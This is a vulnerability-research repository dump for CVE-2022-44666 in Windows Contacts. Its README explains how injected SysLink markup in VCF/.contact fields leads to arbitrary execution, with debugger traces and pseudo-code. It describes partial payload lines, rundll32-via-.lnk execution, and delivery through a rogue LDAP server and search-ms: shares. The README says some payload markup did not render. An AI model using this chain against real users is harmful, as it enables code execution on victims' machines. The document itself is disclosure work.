├── LICENSE ├── README.md ├── bypass ├── diagcab-pocs │ ├── MSWord │ │ ├── hidden │ │ │ └── @payload.diagcab │ │ ├── setup-hidden.bat │ │ └── url-protocol-ldap │ │ │ ├── exploit.docx │ │ │ ├── exploit.rtf │ │ │ └── poc.html │ ├── cert.cer │ └── ldap-rogue-server │ │ └── ldap-server.py ├── further-pocs │ ├── MSWord │ │ ├── hidden │ │ │ ├── @payload.exe │ │ │ ├── @payload.lnk │ │ │ └── payload.bin │ │ ├── setup-hidden.bat │ │ └── url-protocol-ldap │ │ │ ├── exploit.docx │ │ │ ├── exploit.rtf │ │ │ └── poc.html │ └── ldap-rogue-server │ │ └── ldap-server.py ├── images │ ├── msrc-reply-case-closed.png │ ├── partialmatches-diaphora-wab32dll.png │ ├── show-messagebox-wabexe.png │ └── unmatched-diaphora-wab32dll.png ├── jar-poc │ ├── KB-3133722062023.zip │ ├── create-poc.py │ ├── payload │ │ └── calc.jar │ └── template.contact ├── report-pocs │ ├── bypass.contact │ └── hidden │ │ ├── @payload.exe │ │ ├── @payload.lnk │ │ └── payload.bin └── videos │ ├── install-certificate.gif │ ├── jar-exploit.gif │ ├── ldap-msword-diagcab-exploit.gif │ ├── ldap-msword-exploit.gif │ └── simple-payload.gif ├── further-pocs ├── MSWord │ ├── hidden │ │ ├── payload.bin │ │ ├── payload.exe │ │ └── payload.lnk │ ├── poc │ │ ├── KB5014666-hotfix.contact │ │ ├── KB5014666-hotfix.vcf │ │ ├── poc.docx │ │ ├── poc.html │ │ └── poc.rtf │ ├── remote-weaponized-by-searchms │ │ ├── exploit.docx │ │ ├── exploit.rtf │ │ └── poc.html │ ├── setup-hidden.bat │ └── url-protocol-ldap │ │ ├── exploit.docx │ │ ├── exploit.rtf │ │ └── poc.html ├── PDFreaders │ ├── poc │ │ ├── KB5014666-hotfix.contact │ │ ├── KB5014666-hotfix.vcf │ │ ├── poc-contact.pdf │ │ └── poc-vcf.pdf │ ├── remote-weaponized-by-searchms │ │ ├── exploit.html │ │ └── exploit.pdf │ └── url-protocol-ldap │ │ ├── exploit.html │ │ └── exploit.pdf ├── browsers │ ├── poc │ │ ├── KB5014666-hotfix.contact │ │ ├── KB5014666-hotfix.vcf │ │ ├── poc-contact.html │ │ └── poc-vcf.html │ ├── remote-weaponized-by-searchms │ │ └── exploit.html │ └── 
url-protocol-ldap │ │ └── exploit.html ├── ldap-rogue-server │ └── ldap-server.py └── to-copy-in-remote-shared-location │ ├── KB5001337-hotfix │ ├── install-hotfix.contact │ └── install-hotfix.vcf │ ├── hidden │ ├── payload.bin │ ├── payload.exe │ └── payload.lnk │ └── setup-hidden.bat ├── images ├── convert-vcf-to-contact-wabmig.png ├── credits-update-cve-2022-44666.png ├── href-attribute-fake-target.png ├── href-attribute-relative-exec-payload.png ├── href-attribute-relative-lnk-payload.png ├── href-attribute-relative-path.png ├── href-attribute-remote-loc.png ├── msrc-reply-se-attack-not-meet-sec-update.png └── msrc-reply-vcf-opened-non-default-program.png ├── report-pocs ├── exploit.contact ├── exploit.vcf ├── exploit.zip └── hidden │ ├── payload.bin │ ├── payload.exe │ └── payload.lnk ├── src ├── dllmain.cpp └── payload.cpp └── videos ├── browsers-exploit.gif ├── browsers-poc.gif ├── full-payload.gif ├── ldap-browsers-exploit.gif ├── ldap-msword-exploit.gif ├── ldap-pdfreaders-exploit.gif ├── micropatch-0patch.gif ├── msword-exploit.gif ├── msword-poc.gif ├── pdfreaders-exploit.gif ├── pdfreaders-poc.gif └── simple-payload.gif /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. 
For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 
47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2023 j00sean 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day). 2 | 3 | This is the story about another forgotten 0day fully disclosed more than 4 years ago by [John Page (aka hyp3rlinx)][R.1]. To understand the report, you have to consider i'm stupid :-) And my stupidicity drives me to take longer paths to solve simple issues, but it also leads me to figure out another ways to exploit some bugs. Why do i say this? Because i was unable to quickly understand that the way to create a .contact file is just browsing to Contact folder in order to create the contact, instead of that, i used this info to first create a VCF file and then, i wrongly thought that this was some type of variant. 
That was also because my brain couldn't accept that some 0days stay forgotten for so long ¯\\_(ツ)_/¯ Once that was done, and after the "wontfix" replies from [MSRC][R.2] and [ZDI][R.3], further investigation was carried out to increase the severity, finally reaching .contact files and the Windows "ldap" URL protocol handler. 4 | 5 | ## Details 6 | 7 | + **Vendor**: Microsoft. 8 | + **App**: Microsoft Windows Contacts. 9 | + **Version**: 10.0.19044.1826 (OS build the component was tested on; wab.exe ships with Windows under "C:\Program Files\Windows Mail"). 10 | + **Tested systems**: Windows 10 & Windows 11. 11 | + **Tested system versions**: Microsoft Windows [Version 10.0.19044.1826] & Microsoft Windows [Version 10.0.22000.795] 12 | 13 | ## Intro 14 | 15 | This research started while I was reading the exploit code for [this vulnerability][R.4], which was released as a 0day; [ZDI's report][R.5] is also available. 16 | 17 | ***Update 2022/07/21**: After reporting this case to MS, MSRC rightly pointed out to me that Windows Contacts isn't the default program for opening VCF files.* 18 | 19 | ![alt text](<./images/msrc-reply-vcf-opened-non-default-program.png>) 20 | 21 | *Further research still shows that the default program for VCF files on Windows 7 ESU and Windows Server 2019 is Windows Contacts (wab.exe); on Windows 10 and 11 it is MS People (PeopleApp.exe), or MS Outlook when MS Office is installed. 
Here is a full table of this testing:* 22 | 23 | + *Windows 7: Default program for VCF files is Windows Contacts (wab.exe).* 24 | + *Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).* 25 | + *Windows 10: Default program for VCF files is MS People (PeopleApp.exe).* 26 | + *Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).* 27 | + *Windows 11: Default program for VCF files is MS People (PeopleApp.exe).* 28 | 29 | *MSRC still argued that social engineering is involved — the victim must open a crafted VCF file and then click one of the links — so the issue doesn't meet the MSRC bug bar for a security update.* 30 | 31 | ![alt text](<./images/msrc-reply-se-attack-not-meet-sec-update.png>) 32 | 33 | ***Update 2022/07/25**: Well, after further research, it's the same bug. I've finally been able to build a .contact proof of concept: the payload can be made to parse correctly in a .contact file by encoding its special characters (`"`, `<`, `>`) as HTML entities. Note this addresses the previous objection (***Update 2022/07/21***): the .contact format is opened by Windows Contacts, the default program for this extension, even when MS Office is installed on the system. A first-run file association prompt may appear if the extension hasn't been associated yet, but Windows Contacts is the only program installed by default that can open it.* 34 | 35 | ***Update 2022/07/25**: This further research got me to a point I had been trying to reach for some time: using a URL protocol handler to automatically open crafted contact data and exploit the bug. 
I was finally able to get it working thanks to the `ldap:` URI scheme, which is associated by default with the Windows Contacts application. By setting up a rogue LDAP server and serving the payload in the `mail`, `url` or `wwwHomePage` attributes of the returned entry, the impact is increased: the victim no longer has to download and double-click a malicious VCF/Contact file, because the contact data can be delivered through a URL protocol (the victim still has to click the injected link in the contact dialog).* 36 | 37 | ***Update 2023/02/08**: As a gesture of goodwill by MSRC, [John Page (aka hyp3rlinx)][R.1] has been included in the acknowledgement page for the [CVE-2022-44666][R.10] discovery.* 38 | 39 | ![alt text](<./images/credits-update-cve-2022-44666.png>) 40 | 41 | ## Description 42 | 43 | The report is basically the same as the linked ones, but I've improved the social-engineering side a bit. The first thing I did was to improve how the links are displayed: as with an XSS, this is really a markup (HTML) injection into the SysLink control, so a `"` in the URL field closes the `href` attribute of the first anchor element and a new one can be inserted. Then I wanted the injected elements to be invisible; because the control has a character limit, making the visible link text (its "innerHTML") as long as possible is enough to hide them. 44 | 45 | This is the final payload used (note: the injected `<a href="…">` markup between `">` and `CLICKMEEEEE` does not survive rendering here; see the PoC files in ./report-pocs/ for the exact bytes): 46 | 47 | ```html 48 | URL;WORK:">CLICKMEEEEE... 49 | ``` 50 | 51 | To see what happens, run Process Monitor and set a fake target in the href attribute, like this: 52 | 53 | ```html 54 | URL;WORK:">CLICKMEEEEE... 
55 | ``` 56 | 57 | Once clicked the link, an output like this is observed in procmon: 58 | 59 | ![alt text](<./images/href-attribute-fake-target.png>) 60 | 61 | This is the stacktrace for the first "CreateFile" operation: 62 | 63 | ``` 64 | 0 FLTMGR.SYS FltpPerformPreCallbacksWorker + 0x36c 0xfffff806675a666c C:\WINDOWS\System32\drivers\FLTMGR.SYS 65 | 1 FLTMGR.SYS FltpPassThroughInternal + 0xca 0xfffff806675a611a C:\WINDOWS\System32\drivers\FLTMGR.SYS 66 | 2 FLTMGR.SYS FltpCreate + 0x310 0xfffff806675dc0c0 C:\WINDOWS\System32\drivers\FLTMGR.SYS 67 | 3 ntoskrnl.exe IofCallDriver + 0x55 0xfffff8066904e565 C:\WINDOWS\system32\ntoskrnl.exe 68 | 4 ntoskrnl.exe IoCallDriverWithTracing + 0x34 0xfffff8066909c224 C:\WINDOWS\system32\ntoskrnl.exe 69 | 5 ntoskrnl.exe IopParseDevice + 0x117d 0xfffff806694256bd C:\WINDOWS\system32\ntoskrnl.exe 70 | 6 ntoskrnl.exe ObpLookupObjectName + 0x3fe 0xfffff8066941329e C:\WINDOWS\system32\ntoskrnl.exe 71 | 7 ntoskrnl.exe ObOpenObjectByNameEx + 0x1fa 0xfffff806694355fa C:\WINDOWS\system32\ntoskrnl.exe 72 | 8 ntoskrnl.exe NtQueryAttributesFile + 0x1c5 0xfffff80669501125 C:\WINDOWS\system32\ntoskrnl.exe 73 | 9 ntoskrnl.exe KiSystemServiceCopyEnd + 0x25 0xfffff806692097b5 C:\WINDOWS\system32\ntoskrnl.exe 74 | 10 ntdll.dll NtQueryAttributesFile + 0x14 0x7ff8f0aed4e4 C:\Windows\System32\ntdll.dll 75 | 11 KernelBase.dll GetFileAttributesW + 0x85 0x7ff8ee19c045 C:\Windows\System32\KernelBase.dll 76 | 12 shlwapi.dll PathFileExistsAndAttributesW + 0x5a 0x7ff8ef20212a C:\Windows\System32\shlwapi.dll 77 | 13 shlwapi.dll PathFileExistsDefExtAndAttributesW + 0xa1 0x7ff8ef2022b1 C:\Windows\System32\shlwapi.dll 78 | 14 shlwapi.dll PathFileExistsDefExtW + 0x3f 0x7ff8ef2021ef C:\Windows\System32\shlwapi.dll 79 | 15 shlwapi.dll PathFindOnPathExW + 0x2f7 0x7ff8ef201f77 C:\Windows\System32\shlwapi.dll 80 | 16 shell32.dll PathResolve + 0x154 0x7ff8eebb0954 C:\Windows\System32\shell32.dll 81 | 17 shell32.dll CShellExecute::QualifyFileIfNeeded + 0x105 
0x7ff8eebb05c9 C:\Windows\System32\shell32.dll 82 | 18 shell32.dll CShellExecute::ValidateAndResolveFileIfNeeded + 0x5e 0x7ff8eeb1e422 C:\Windows\System32\shell32.dll 83 | 19 shell32.dll CShellExecute::_DoExecute + 0x6d 0x7ff8eeb1e1cd C:\Windows\System32\shell32.dll 84 | 20 shell32.dll :: + 0x2d 0x7ff8eeb09fed C:\Windows\System32\shell32.dll 85 | 21 SHCore.dll _WrapperThreadProc + 0xe9 0x7ff8f098bf69 C:\Windows\System32\SHCore.dll 86 | 22 kernel32.dll BaseThreadInitThunk + 0x14 0x7ff8f07e7034 C:\Windows\System32\kernel32.dll 87 | 23 ntdll.dll RtlUserThreadStart + 0x21 0x7ff8f0aa2651 C:\Windows\System32\ntdll.dll 88 | ``` 89 | 90 | Setting a breakpoint in **Shell32!ShellExecuteExW**, we can have a clearer picture of the functions involved: 91 | 92 | ``` 93 | CommandLine: "C:\Program Files\Windows Mail\wab.exe" /vcard C:\Users\admin\Documents\vcf-0day\exploit.vcf 94 | ... 95 | ModLoad: 00007ff7`c7d50000 00007ff7`c7dd5000 wab.exe 96 | ... 97 | 0:000> bp SHELL32!ShellExecuteExW 98 | ... 99 | Breakpoint 0 hit 100 | SHELL32!ShellExecuteExW: 101 | 00007ff8`eeb20e40 48895c2410 mov qword ptr [rsp+10h],rbx ss:000000d8`dc2dae88=0000000000090622 102 | 0:000> k 103 | # Child-SP RetAddr Call Site 104 | 00 000000d8`dc2dae78 00007ff8`d3afee27 SHELL32!ShellExecuteExW 105 | 01 000000d8`dc2dae80 00007ff8`d3ad7802 wab32!SafeExecute+0x143 106 | 02 000000d8`dc2dbf90 00007ff8`ef3b2920 wab32!fnSummaryProc+0x1c2 107 | 03 000000d8`dc2dbfc0 00007ff8`ef3b20c2 USER32!UserCallDlgProcCheckWow+0x144 108 | 04 000000d8`dc2dc0a0 00007ff8`ef3b1fd6 USER32!DefDlgProcWorker+0xd2 109 | 05 000000d8`dc2dc160 00007ff8`ef3ae858 USER32!DefDlgProcW+0x36 110 | 06 000000d8`dc2dc1a0 00007ff8`ef3ade1b USER32!UserCallWinProcCheckWow+0x2f8 111 | 07 000000d8`dc2dc330 00007ff8`ef3ad68a USER32!SendMessageWorker+0x70b 112 | 08 000000d8`dc2dc3d0 00007ff8`d93a6579 USER32!SendMessageW+0xda 113 | 09 000000d8`dc2dc420 00007ff8`d93a62e7 comctl32!CLink::SendNotify+0x12d 114 | 0a 000000d8`dc2dd560 00007ff8`d9384bb8 
comctl32!CLink::Notify+0x77 115 | 0b 000000d8`dc2dd590 00007ff8`d935add2 comctl32!CMarkup::OnButtonUp+0x78 116 | 0c 000000d8`dc2dd5e0 00007ff8`ef3ae858 comctl32!CLink::WndProc+0x86ff2 117 | 0d 000000d8`dc2dd6f0 00007ff8`ef3ae299 USER32!UserCallWinProcCheckWow+0x2f8 118 | 0e 000000d8`dc2dd880 00007ff8`ef3ac050 USER32!DispatchMessageWorker+0x249 119 | 0f 000000d8`dc2dd900 00007ff8`d92b6317 USER32!IsDialogMessageW+0x280 120 | 10 000000d8`dc2dd990 00007ff8`d92b61b3 comctl32!Prop_IsDialogMessage+0x4b 121 | 11 000000d8`dc2dd9d0 00007ff8`d92b5e2d comctl32!_RealPropertySheet+0x2bb 122 | 12 000000d8`dc2ddaa0 00007ff8`d3acfb68 comctl32!_PropertySheet+0x49 123 | 13 000000d8`dc2ddad0 00007ff8`d3ace871 wab32!CreateDetailsPropertySheet+0x930 124 | 14 000000d8`dc2de140 00007ff8`d3ad68f5 wab32!HrShowOneOffDetails+0x4f5 125 | 15 000000d8`dc2de390 00007ff8`d3af800f wab32!HrShowOneOffDetailsOnVCard+0xed 126 | 16 000000d8`dc2de400 00007ff7`c7d51b16 wab32!WABObjectInternal::VCardDisplay+0xbf 127 | 17 000000d8`dc2de450 00007ff7`c7d52c28 wab!WinMain+0x896 128 | 18 000000d8`dc2dfab0 00007ff8`f07e7034 wab!__mainCRTStartup+0x1a0 129 | 19 000000d8`dc2dfb70 00007ff8`f0aa2651 KERNEL32!BaseThreadInitThunk+0x14 130 | 1a 000000d8`dc2dfba0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 131 | ``` 132 | 133 | And the involved pseudo-code is the next: 134 | 135 | ```cpp 136 | _int64 __fastcall fnSummaryProc(HWND hWnd, int a2, WPARAM a3, LONG_PTR a4) 137 | { 138 | 139 | ... 
140 | 141 | default: 142 | if ( !((v22 + 4) & 0xFFFFFFFD) && *(_WORD *)(v5 + 136) ) 143 | SafeExecute(v7, (const unsigned __int16 *)v9, (const unsigned __int16 *)(v5 + 136)); <== FOLLOW THIS PATH 144 | break; 145 | } 146 | } 147 | return 1i64; 148 | } 149 | 150 | 151 | __int64 __fastcall SafeExecute(HWND a1, const unsigned __int16 *a2, const unsigned __int16 *a3) 152 | { 153 | const unsigned __int16 *v3; // rbx 154 | HWND v4; // rdi 155 | unsigned int v5; // ebx 156 | BOOL v6; // ebx 157 | __int64 v7; // rdx 158 | OLECHAR *v8; // rax 159 | signed int v10; // eax 160 | DWORD pcchCanonicalized; // [rsp+20h] [rbp-E0h] 161 | SHELLEXECUTEINFOW pExecInfo; // [rsp+30h] [rbp-D0h] 162 | OLECHAR Dst[2088]; // [rsp+A0h] [rbp-60h] 163 | 164 | v3 = a3; 165 | v4 = a1; 166 | memset_0(Dst, 0, 0x1048ui64); 167 | pcchCanonicalized = 2084; 168 | v5 = UrlCanonicalizeW(v3, Dst, &pcchCanonicalized, 0); 169 | if ( (v5 & 0x80000000) == 0 ) 170 | { 171 | v6 = UrlIsW(Dst, URLIS_FILEURL); 172 | pExecInfo.hProcess = 0i64; 173 | pExecInfo.hwnd = 0i64; 174 | pExecInfo.lpVerb = 0i64; 175 | _mm_store_si128((__m128i *)&pExecInfo.lpParameters, (__m128i)0i64); 176 | *(_OWORD *)&pExecInfo.hInstApp = 0i64; 177 | *(_OWORD *)&pExecInfo.lpClass = 0i64; 178 | *(_OWORD *)&pExecInfo.dwHotKey = 0i64; 179 | if ( !ShellExecuteExW(&pExecInfo) ) <== CALL HERE 180 | { 181 | v10 = GetLastError(); 182 | v5 = (unsigned __int16)v10 | 0x80070000; 183 | if ( v10 <= 0 ) 184 | v5 = v10; 185 | } 186 | } 187 | ... 188 | } 189 | ``` 190 | 191 | After this, it's clear the issue actually involves [SysLink controls in comctl32.dll library][R.6] and how the href attribute is handled by wab32.dll: the contact's URL field is rendered as SysLink markup without escaping, so a `"` in the field closes the `href` attribute and attacker-controlled markup follows. When the link is clicked (`comctl32!CLink::SendNotify` → `wab32!fnSummaryProc` in the stack above), `wab32!SafeExecute` canonicalizes the href value with `UrlCanonicalizeW` and hands it to `ShellExecuteExW` with no verb and no restriction to a URL scheme — in the excerpt above the `UrlIsW(..., URLIS_FILEURL)` result (`v6`) does not appear to gate the call, although part of the function is elided. The shell then resolves the value as a path (`CShellExecute::QualifyFileIfNeeded` → `PathResolve` → `PathFindOnPathExW` in the Process Monitor stack), so a local file name, absolute or relative to wab.exe's working directory, ends up being executed. 192 | 193 | It isn't possible to point the href directly at a remote shared location (UNC/SMB share or WebDAV) to exploit this: 194 | 195 | ```html 196 | URL;WORK:">CLICKMEEEEE... 197 | URL;WORK:">CLICKMEEEEE... 198 | ``` 199 | 200 | The remote file's information is queried (visible in Process Monitor) but the file is never executed. 
201 | 202 | ![alt text](<./images/href-attribute-remote-loc.png>) 203 | 204 | It's possible to use relative paths such as: 205 | 206 | ```html 207 | URL;WORK:">CLICKMEEEEE... 208 | ``` 209 | 210 | ![alt text](<./images/href-attribute-relative-path.png>) 211 | 212 | Example (relative paths resolve against wab.exe's working directory — presumably the folder containing the opened .vcf/.contact file, which is why the PoCs ship a `hidden` folder next to it): 213 | 214 | ```html 215 | URL;WORK:">CLICKMEEEEE... 216 | ``` 217 | 218 | ![alt text](<./images/href-attribute-relative-exec-payload.png>) 219 | 220 | Going further, while testing rundll32 as the attack vector I noticed that the href cannot carry command-line arguments for the selected payload executable (presumably because the whole value is passed as the file to execute and `lpParameters` is left empty, as the `SafeExecute` excerpt above suggests). However, using a .lnk file whose target is the chosen executable plus its arguments, command-line arguments can be used. It's a bit tricky but it works. 221 | 222 | ```html 223 | URL;WORK:">CLICKMEEEEE... 224 | ``` 225 | 226 | Target of the .lnk file (run.lnk in this example; shipped as hidden/payload.lnk in the PoCs): 227 | 228 | ``` 229 | rundll32.exe hidden\payload.bin,Foo" 230 | ``` 231 | 232 | ![alt text](<./images/href-attribute-relative-lnk-payload.png>) 233 | 234 | This is more interesting because no .exe has to be dropped on the target system: the payload DLL is shipped with a non-executable extension (payload.bin) and is loaded through rundll32.exe, a built-in Windows binary. 235 | 236 | 237 | ## Impact 238 | 239 | Arbitrary code execution in the context of the logged-on user. It is not a privilege escalation, and it requires user interaction: the victim must open the crafted VCF/Contact file (or the `ldap:` URI) and click one of the injected links. 240 | 241 | 242 | ## Proofs of Concept 243 | 244 | For the .vcf PoC, a file association making Windows Contacts the handler for .vcf files must exist (see the per-OS table in the Intro). 245 | 246 | ***Update 2022/07/25**: For Contact files (.contact) there is only one application to open them by default: Windows Contacts, even when MS Office is installed in the target system.* 247 | 248 | Using files located in [./report-pocs/](./report-pocs/): 249 | 250 | 1. Double-click the file [exploit.vcf](./report-pocs/exploit.vcf) (***Update 2022/07/25***: Or double-click the file [exploit.contact](./report-pocs/exploit.contact)). 251 | 2. Single-click one of the "click-me" links. 252 | 3. notepad.exe is launched through a different execution path per link: 253 | - 3.1. Link 1: Run .lnk file that triggers rundll32 with a crafted library. 254 | - 3.2. 
Link 2: Executes payload.exe from the "hidden" folder via a relative local path. 255 | - 3.3. Link 3: Launches notepad.exe directly. 256 | 257 | 258 | There are a couple of videos attached in [./videos](./videos): 259 | 260 | + [./videos/simple-payload.gif](./videos/simple-payload.gif): Example where a single VCF file is downloaded and opened, triggering the bug. 261 | 262 | ![alt text](<./videos/simple-payload.gif>) 263 | 264 | + [./videos/full-payload.gif](./videos/full-payload.gif): A more complex example which downloads a zip file that allows all the payloads to be triggered. 265 | 266 | ![alt text](<./videos/full-payload.gif>) 267 | 268 | This is a summary of the proof of concept files located in ./report-pocs/: 269 | 270 | + [./report-pocs/exploit.vcf](./report-pocs/exploit.vcf): Proof of concept to double-click. 271 | + [./report-pocs/exploit.zip](./report-pocs/exploit.zip): Zipped file to be downloaded which includes all the tricks to exploit the bug (video: [full-payload.gif](./videos/full-payload.gif)) 272 | + [./report-pocs/hidden/payload.lnk](./report-pocs/hidden/payload.lnk): LNK file to run the payload with cmdline arguments. 273 | + [./report-pocs/hidden/payload.bin](./report-pocs/hidden/payload.bin): DLL payload. It finally runs notepad.exe 274 | + [./report-pocs/hidden/payload.exe](./report-pocs/hidden/payload.exe): Executable payload. It finally runs notepad.exe 275 | 276 | 277 | And files located in [./src](./src): 278 | 279 | + [dllmain.cpp](./src/dllmain.cpp): DLL library used as payload (payload.bin). 280 | + [payload.cpp](./src/payload.cpp): Executable used as payload (payload.exe). 281 | 282 | 283 | ## Further exploitation 284 | 285 | For further exploitation, since the href cannot load files from a remote shared location directly, the `search-ms:` URI protocol is an interesting delivery vector: it makes Explorer show the contents of an attacker-controlled share (SMB or WebDAV) as search results, so the victim opens the .contact/.vcf from that share and the relative `hidden\...` paths resolve on the share, with no file dropped locally beforehand. 
